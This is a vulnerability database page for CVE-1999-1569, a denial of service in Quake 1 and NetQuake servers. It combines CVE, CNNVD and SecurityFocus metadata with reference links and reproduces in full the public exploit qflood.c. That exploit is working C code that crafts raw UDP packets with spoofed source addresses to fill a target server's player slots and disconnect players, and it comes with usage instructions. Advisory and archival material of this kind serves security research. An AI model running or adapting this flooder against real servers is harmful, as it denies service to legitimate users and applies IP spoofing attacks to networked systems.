CVE-1999-1569
CVSS 5.0
Published: 2001-07-17 00:00:00
Last revised: 2016-10-17 22:06:03

[Original] Quake 1 and NetQuake servers allow remote attackers to cause a denial of service (resource exhaustion or forced disconnection) via a flood of spoofed UDP connection packets, which exceeds the server's player limit.


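[CNNVD] ID Software Quake denial-of-service attack (CNNVD-200107-109)

        CVE(CAN) ID: CAN-1999-1569

        Quake is a very popular 3D first-person shooter game developed by ID software. Its network implementation is flawed,
        and a malicious remote user can prevent legitimate players from connecting to the Quake server. In addition,
        connections already established to the Quake server may be cut off.

        <* Source: Andrew J.Gavin (GAVINA@student.gvsu.edu) *>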

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

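- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1569
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1569
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-109
(official data source) CNNVD

- Other links and resources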

http://marc.info/?l=bugtraq&m=90221101925989&w=2
(UNKNOWN)  BUGTRAQ  19980502 NetQuake Protocol problem resulting in smurf like effect.
http://marc.info/?l=bugtraq&m=91012172524181&w=2
(UNKNOWN)  BUGTRAQ  19981101 Quake problem?
http://www.securityfocus.com/archive/1/197268
(UNKNOWN)  BUGTRAQ  20010716 Quake client and server denial-of-service
http://www.securityfocus.com/bid/3051
(VENDOR_ADVISORY)  BID  3051
http://xforce.iss.net/static/6871.php
(VENDOR_ADVISORY)  XF  quake-spoofed-client-dos(6871)

- Vulnerability information

ID Software Quake denial-of-service attack
Medium risk Other
2001-07-17 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        None available

- Vulnerability information (21012)

ID Software Quake 1.9 Denial of Service Vulnerability (EDBID:21012)
multiple dos
2001-07-17 Verified
0 Andy Gavin
N/A
source: http://www.securityfocus.com/bid/3051/info

Quake is a very popular 3D "first-person-shooter" game from ID software.

A flaw has been identified in the product's network play features which allows a maliciously designed client to prevent legitimate players from connecting to the Quake server. Additionally, it is possible to disconnect players that have already connected to the Quake server. 

/*
  qflood.c - Written by Andy Gavin (_k3nny@Efnet, k@EnterTheGame)
  UDP spoofing idea taken from "arnudp" by Arny (cs6171@scitsc.wlv.ac.uk)
  Original idea discussed on Bugtraq in 1998.

  This program will fill up a Quake server with spoofed
  "unconnected" clients, disallowing other players the
  ability to connect to the server since the player limit
  fills up quickly.  Additionally, if the server does not
  support multiple clients from the same IP address, it will
  disconnect legitimate players if the spoofed connection
  request matches that player.

  Compiled on linux 2.2.19 with gcc 2.91.
  Tested to work on all NetQuake servers.
  Vendor status: Not contacted, since id Software has long
  abandoned Quake.

  Andy Gavin is not responsible for what you do with this
  program.  This is  meant for testing purposes only.

  Greets:
  - Karen;
  - Parents, Tim, Erica, and my dog;
  - insyder, mechtoad, def, ap0k, informer, scythe, zer0v,
    fain, and the rest of #clanchat on Efnet;
  - deek, cha0ticz, schmorky, Ir8Pir8, redmund, vise,
    _nuclear_, and the rest of #prediction on EnterTheGame;
  - Joe W, Brian L (good luck...and we'll miss you), and the
    rest of the crew at work;
  - Steve Yzerman
  - Led Zeppelin, Pearl Jam, Radiohead, and Hum
*/

#include <ctype.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <sys/socket.h>
#include <sys/types.h>

struct sockaddr sa;
struct node
{
  char *address;
  struct node *next;
};

struct node *head = NULL;
struct node *tail;

void add_address( struct node **, char * );
void sig_handler( int );

int main( int argc, char **argv )
{
  int x = 1;
  int source_port, delay, fd;
  struct sockaddr_in *p;
  struct hostent *he;
  struct node *current;
  char *temp;

  u_char thePACKET[41]=
  {
    0x45,                       /* IP version, header len */
    0x00,                       /* IP diff services field */
    0x00, 0x29,                 /* IP total length */
    0xc2, 0xb5,                 /* IP id */
    0x00, 0x00,                 /* IP fragment offset */
    0x80,                       /* IP TTL */
    0x11,                       /* IP protocol */
    0, 0,                       /* IP header checksum */
    0, 0, 0, 0,                 /* IP src */
    0, 0, 0, 0,                 /* IP dest */
    0x00, 0x00,                 /* UDP src port */
    0, 0,                       /* UDP dest port */
    0x00, 0x15,                 /* length = 21 */
    0x00, 0x00,                 /* UDP checksum */
    0x80, 0x00,                 /* Quake flags */
    0x00, 0x0d,                 /* Quake length */
    0x01,                       /* Quake command = connect */
    0x51, 0x55, 0x41, 0x4b,     /* Quake game = QUAKE */
    0x45, 0x00,
    0x03, 0x01                  /* Quake version = 3 */
  };

  if( argc != 5 )
  {
    fprintf( stderr, "\nqflood - floods Quake servers with spoofed connection requests\n" );
    fprintf( stderr, "\tWritten by Andy Gavin (_k3nny@Efnet, k@ETG)\n" );
    fprintf( stderr, "\tUsage: %s <src> <server> <server_port> <delay>\n", *argv );
    fprintf( stderr, "\t\tsrc = comma-delimited list of IPs/hostnames\n" );
    fprintf( stderr, "\t\tserver = Quake server IP/hostname\n" );
    fprintf( stderr, "\t\tserver_port = Quake server port\n" );
    fprintf( stderr, "\t\tdelay = delay between connection requests (in msec)\n" );
    fprintf( stderr, "\t\texample: %s 10.0.0.2,10.0.0.3 10.0.0.10 26000 500\n\n", argv[0] );
    exit( 0 );
  }

  srand( time( NULL ));
  delay = atoi( argv[4] ) * 1000;

  /* build a linked list of addresses entered on command line */
  temp = strtok( argv[1], "," );
  add_address( &head, temp );

  signal( SIGINT, sig_handler );

  tail = head;

  temp = strtok( NULL, "," );
  while( temp != NULL )
  {
    add_address( &(tail->next), temp );
    tail = tail->next;
    temp = strtok( NULL, "," );
  }

  current = head;

  while( 1 )
  {
    while( current != NULL )
    {
      if( ( he = gethostbyname( current->address )) == NULL )
      {
        fprintf( stderr, "Can't resolve src\n" );
        exit( 0 );
      }

      bcopy( *( he->h_addr_list ), ( thePACKET + 12 ), 4 );

      if( ( he = gethostbyname( argv[2]) ) == NULL )
      {
        fprintf( stderr, "Can't resolve server\n");
        exit( 0 );
      }

      bcopy( *( he->h_addr_list ), ( thePACKET + 16 ), 4 );

      source_port = rand() % 3976 + 1024;

      *(u_short*)(thePACKET + 20) = htons( (u_short) source_port );
      *(u_short*)(thePACKET + 22) = htons( (u_short) atoi( argv[3] ));

      p = ( struct sockaddr_in* ) &sa;
      p->sin_family = AF_INET;
      bcopy( *( he->h_addr_list ), &(p->sin_addr), sizeof( struct in_addr ) );

      if(( fd=socket( AF_INET, SOCK_RAW, IPPROTO_RAW )) == -1 )
      {
        perror( "Can't create raw socket (you must run as root)" );
        exit( 0 );
      }

      if( setsockopt( fd, IPPROTO_IP, IP_HDRINCL, (char*)&x, sizeof(x)) < 0 )
      {
        perror( "setsockopt IP_HDRINCL error" );
        exit( 0 );
      }

      if(( sendto( fd, &thePACKET, sizeof(thePACKET), 0, (struct sockaddr*)p, sizeof(struct sockaddr ))) == -1)
      {
        perror( "sendto error" );
        exit( 0 );
      }

      printf( "Quake connection request sent from %s:%i to %s:%s\n", current->address, source_port, argv[2], argv[3] );

      usleep( delay );
      current = current->next;
    }
    current = head;
  }
  exit( 1 );
}

void add_address( struct node** reference, char *data )
{
  struct node* new_node = malloc( sizeof( struct node ));

  new_node->address = data;
  new_node->next = *reference;
  *reference = new_node;
}

void sig_handler( int number )
{
  struct node *current = head;
  struct node *next;

  printf( "\nCaught SIGINT.  Cleaning up memory..." );
  while( current != NULL )
  {
    next = current->next;
    free( current );
    current = next;
  }
  printf( "done.\n\n" );
  exit( 1 );
}

		

- Vulnerability information

9848
Quake 1/NetQuake Spoofed UDP Packet Consumption DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

- Timeline

2001-07-16 Unknown
2001-07-16 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

ID Software Quake Denial of Service Vulnerability
Origin Validation Error 3051
Yes No
2001-07-17 12:00:00 2009-07-11 06:56:00
Reported to bugtraq by Andrew J.Gavin <GAVINA@student.gvsu.edu> on July 17, 2001. Attributed to a discussion thread in the bugtraq mailing list in 1998.

- Affected software versions

id Software Quake 1.9

- Vulnerability discussion

Quake is a very popular 3D "first-person-shooter" game from ID software.

A flaw has been identified in the product's network play features which allows a maliciously designed client to prevent legitimate players from connecting to the Quake server. Additionally, it is possible to disconnect players that have already connected to the Quake server.

- Exploit

qflood.c - Written by Andy Gavin (_k3nny@Efnet, k@EnterTheGame)

UDP spoofing idea taken from "arnudp" by Arny (cs6171@scitsc.wlv.ac.uk)

Original idea discussed on Bugtraq in 1998.

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

     

     
